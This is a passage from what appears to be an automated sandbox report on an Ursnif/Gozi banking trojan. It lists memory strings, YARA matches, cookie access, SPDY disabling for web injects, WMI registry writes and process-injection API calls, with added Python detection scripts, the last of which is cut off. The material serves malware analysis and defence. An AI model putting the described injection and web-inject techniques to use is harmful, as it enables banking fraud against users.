Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_01385ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 0_2_01385ECA
Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_01385ECA
Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
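Two registry observations in this report are worth turning into detection logic: the EnableSPDY3_0 = 0 write under Internet Settings (listed under E-Banking Fraud as the web-inject preparation step) and the registry writes issued through IWbemServices::ExecMethod on the StdRegProv class in root\default. The second matters for attribution: StdRegProv executes inside the WMI provider host, so a registry-event sensor records WmiPrvSE.exe as the writer and the caller (loaddll32.exe here) only shows up in WMI method traces. The following is an added example, not code from the report or from Joe Sandbox. The event records are constructed for the example; their shape is modelled on Sysmon Event ID 13 (Details such as "DWORD (0x00000000)", HKCU reported as HKU\<SID>\...) and on the report's own "IWbemServices::ExecMethod - root\default : StdRegProv::<method>" lines. The StdRegProv write-method list is the class's documented set of modifying methods; the SID is made up.

```python
r"""Triage registry tampering seen in a sandbox run (added example, not report code).

Flags (1) EnableSPDY3_0 being set to 0, and (2) registry writes routed through
WMI's StdRegProv, re-attributing provider-host writes to the ExecMethod caller.
Event records are constructed; shape modelled on Sysmon Event ID 13 and on the
report's "IWbemServices::ExecMethod - root\default : StdRegProv::<method>" lines.
"""
import re
from collections import defaultdict

# StdRegProv methods that modify the registry (the Get*/Enum*/Check* methods only read).
STDREGPROV_WRITE_METHODS = {
    "CreateKey", "DeleteKey", "DeleteValue", "SetBinaryValue", "SetDWORDValue",
    "SetQWORDValue", "SetExpandedStringValue", "SetMultiStringValue",
    "SetStringValue", "SetSecurityDescriptor",
}
# StdRegProv runs inside the WMI provider host, so a registry-event sensor sees
# WmiPrvSE.exe as the writer, not the process that called ExecMethod.
WMI_PROVIDER_HOST = "wmiprvse.exe"
# Sysmon reports HKCU keys as HKU\<SID>\..., so match on the path suffix only.
SPDY_VALUE_SUFFIX = r"\software\microsoft\windows\currentversion\internet settings\enablespdy3_0"

_DWORD_RE = re.compile(r"^DWORD \(0x([0-9A-Fa-f]{8})\)$")


def parse_dword(details):
    """'DWORD (0x00000000)' -> 0; None for Details strings that are not a DWORD."""
    m = _DWORD_RE.match(details)
    return int(m.group(1), 16) if m else None


def is_spdy_disable(event):
    """True for a value-set event that turns EnableSPDY3_0 off."""
    return (event["type"] == "RegistryValueSet"
            and event["target"].lower().endswith(SPDY_VALUE_SUFFIX)
            and parse_dword(event["details"]) == 0)


def wmi_registry_writers(events):
    """Map image -> StdRegProv write methods it invoked via IWbemServices::ExecMethod."""
    writers = defaultdict(set)
    for e in events:
        if (e["type"] == "WmiExecMethod"
                and e["namespace"].lower() == r"root\default"
                and e["class"] == "StdRegProv"
                and e["method"] in STDREGPROV_WRITE_METHODS):
            writers[e["image"]].add(e["method"])
    return dict(writers)


def triage(events):
    """Return findings: one per WMI registry writer, one per SPDY-disable write."""
    findings = []
    callers = wmi_registry_writers(events)
    for image, methods in sorted(callers.items()):
        findings.append({"finding": "registry_written_via_wmi", "actor": image,
                         "methods": sorted(methods)})
    for e in events:
        if not is_spdy_disable(e):
            continue
        actor = e["image"]
        # Re-attribute a provider-host write to the StdRegProv caller(s) seen in the
        # same trace. A real pipeline should also bound this by time; the example
        # treats the whole trace as one window.
        if actor.lower().endswith(WMI_PROVIDER_HOST) and callers:
            actor = " | ".join(sorted(callers))
        findings.append({"finding": "spdy_disabled_for_webinject", "actor": actor,
                         "target": e["target"]})
    return findings


# Constructed sample trace (made-up SID); mirrors the report's loaddll32.exe WMI
# calls and explorer.exe EnableSPDY3_0 write, plus a benign re-enable that must not fire.
_SID_KEY = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
_SPDY = _SID_KEY + r"\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0"
SAMPLE_EVENTS = [
    {"type": "WmiExecMethod", "image": r"C:\Windows\System32\loaddll32.exe",
     "namespace": r"root\default", "class": "StdRegProv", "method": "GetStringValue"},
    {"type": "WmiExecMethod", "image": r"C:\Windows\System32\loaddll32.exe",
     "namespace": r"root\default", "class": "StdRegProv", "method": "SetDWORDValue"},
    {"type": "WmiExecMethod", "image": r"C:\Windows\System32\loaddll32.exe",
     "namespace": r"root\default", "class": "StdRegProv", "method": "SetBinaryValue"},
    {"type": "RegistryValueSet", "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "target": _SPDY, "details": "DWORD (0x00000000)"},
    {"type": "RegistryValueSet", "image": r"C:\Windows\explorer.exe",
     "target": _SPDY, "details": "DWORD (0x00000000)"},
    {"type": "RegistryValueSet", "image": r"C:\Windows\explorer.exe",
     "target": _SPDY, "details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

On the constructed trace this yields one "registry_written_via_wmi" finding for loaddll32.exe (SetBinaryValue, SetDWORDValue; the GetStringValue read is ignored) and two "spdy_disabled_for_webinject" findings, the first re-attributed from WmiPrvSE.exe to loaddll32.exe and the second to explorer.exe, matching what the report shows.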
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset, 0_2_10001C22
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001AD1 NtMapViewOfSection, 0_2_10001AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001252 GetLastError,NtClose, 0_2_10001252
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023C5 NtQueryVirtualMemory, 0_2_100023C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F86EF1 GetProcAddress,NtCreateSection,memset, 0_2_00F86EF1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F89DDB NtMapViewOfSection, 0_2_00F89DDB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F87925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00F87925
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8B169 NtQueryVirtualMemory, 0_2_00F8B169
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0138A027
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E010 GetProcAddress,NtCreateSection,memset, 0_2_0138E010
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01397AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_01397AFF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01397579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 0_2_01397579
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139CD7A NtQueryInformationProcess, 0_2_0139CD7A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01389DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01389DAC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01396CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_01396CBC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_0139AC94
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0138ACD5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A47A1 NtMapViewOfSection, 0_2_013A47A1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013837E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_013837E7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01387E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_01387E14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_013A298D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01387878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_01387878
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013940A7 memset,NtQueryInformationProcess, 0_2_013940A7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0138AA15
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0139956E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013845FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_013845FF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01394C67 NtGetContextThread,RtlNtStatusToDosError, 0_2_01394C67
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01391606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_01391606
Source: C:\Windows\explorer.exe Code function: 32_2_04E01DF4 NtWriteVirtualMemory, 32_2_04E01DF4
Source: C:\Windows\explorer.exe Code function: 32_2_04DE7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 32_2_04DE7DA0
Source: C:\Windows\explorer.exe Code function: 32_2_04E046EC NtAllocateVirtualMemory, 32_2_04E046EC
Source: C:\Windows\explorer.exe Code function: 32_2_04DF3EF4 NtQuerySystemInformation, 32_2_04DF3EF4
Source: C:\Windows\explorer.exe Code function: 32_2_04DFF0D0 NtReadVirtualMemory, 32_2_04DFF0D0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF1084 NtQueryInformationProcess, 32_2_04DF1084
Source: C:\Windows\explorer.exe Code function: 32_2_04DE69DC NtSetContextThread,NtUnmapViewOfSection,NtClose, 32_2_04DE69DC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 32_2_04E0D9EC
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB980 NtMapViewOfSection, 32_2_04DEB980
Source: C:\Windows\explorer.exe Code function: 32_2_04DE1148 NtCreateSection, 32_2_04DE1148
Source: C:\Windows\explorer.exe Code function: 32_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_04E21003
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF40A4 NtQueryInformationProcess, 33_2_00AF40A4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE1084 NtQueryInformationProcess, 33_2_00AE1084
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEF0D0 NtReadVirtualMemory, 33_2_00AEF0D0
Source: C:\Windows\System32\control.exe Code function: 33_2_00ADB980 NtMapViewOfSection, 33_2_00ADB980
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFD9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 33_2_00AFD9EC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD69DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 33_2_00AD69DC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD1148 NtCreateSection, 33_2_00AD1148
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 33_2_00AD7DA0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF1DF4 NtWriteVirtualMemory, 33_2_00AF1DF4
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF46EC NtAllocateVirtualMemory, 33_2_00AF46EC
Source: C:\Windows\System32\control.exe Code function: 33_2_00B11003 NtProtectVirtualMemory,NtProtectVirtualMemory, 33_2_00B11003
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675761084 NtQueryInformationProcess, 36_2_0000020675761084
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 36_2_000002067577D9EC
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675791003 NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_0000020675791003
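Read on its own, "Contains functionality to call native functions" is a weak signal; what makes the listing above significant is that the same image's functions together cover every step of a section-mapping and thread-hijack injection: NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection, NtAllocateVirtualMemory/NtWriteVirtualMemory/NtProtectVirtualMemory, and NtSetContextThread/NtGetContextThread/CreateRemoteThread/ResumeThread/NtSetInformationProcess, in loaddll32.exe and again in the injected explorer.exe. The following is an added example, not code from the report or from Joe Sandbox: a parser for the report's own "Source: <image> Code function: <id> <api>,<api>,... <id>" lines and a heuristic that flags an image whose listed functions span all three groups. SAMPLE_LINES are quoted verbatim from this report; the grouping of APIs into steps is the example's own analyst heuristic, not a classification the report makes.

```python
r"""Extract API chains from Joe Sandbox "Code function" lines and spot injection.

Added example, not part of the report. Parses the report's own lines and flags a
process image as carrying a section-mapping / thread-hijack injection chain when
its functions, taken together, touch all three primitive groups below.
"""
import re
from collections import defaultdict

# Analyst heuristic (this example's own grouping), not a taxonomy from the report.
INJECTION_PRIMITIVES = {
    "section_map": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "remote_write": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"},
    "thread_hijack": {"NtGetContextThread", "NtSetContextThread", "CreateRemoteThread",
                      "ResumeThread", "NtSetInformationProcess"},
}
CHAIN_STEPS = frozenset(INJECTION_PRIMITIVES)

# Optional leading id, comma-separated API names (trailing comma is common), an
# optional string argument such as \cookie.ff, then the id repeated. Lines with no
# API names (the "Detected potential crypto function" entries) do not match.
_CODE_FUNCTION_RE = re.compile(
    r"^Source: (?P<image>\S+) Code function: "
    r"(?:(?P<fid>\d+_\d+_[0-9A-Fa-f]+) )?"
    r"(?P<apis>[A-Za-z]\w*(?:,[A-Za-z]\w*)*),?"
    r"(?: (?P<arg>\S+))?"
    r" (?P<fid_tail>\d+_\d+_[0-9A-Fa-f]+)$"
)


def parse_code_function(line):
    """One report line -> dict(image, function_id, apis, argument), or None."""
    m = _CODE_FUNCTION_RE.match(line.strip())
    if not m:
        return None
    return {
        "image": m["image"],
        "function_id": m["fid"] or m["fid_tail"],
        "apis": m["apis"].split(","),
        "argument": m["arg"],
    }


def classify(apis):
    """Return the set of injection steps an API list touches (possibly empty)."""
    found = set(apis)
    return {step for step, names in INJECTION_PRIMITIVES.items() if found & names}


def steps_per_image(lines):
    """Union of injection steps over all parsed functions, keyed by process image."""
    per_image = defaultdict(set)
    for line in lines:
        rec = parse_code_function(line)
        if rec:
            per_image[rec["image"]] |= classify(rec["apis"])
    return dict(per_image)


def injection_chain_images(lines):
    """Images whose listed functions together cover every step of the chain."""
    return {img for img, steps in steps_per_image(lines).items() if steps >= CHAIN_STEPS}


# Quoted verbatim from this report's signature listing.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset, 0_2_10001C22",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001AD1 NtMapViewOfSection, 0_2_10001AD1",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013837E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_013837E7",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_013A298D",
    r"Source: C:\Windows\explorer.exe Code function: 32_2_04DE7DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 32_2_04DE7DA0",
    r"Source: C:\Windows\explorer.exe Code function: 32_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory, 32_2_04E21003",
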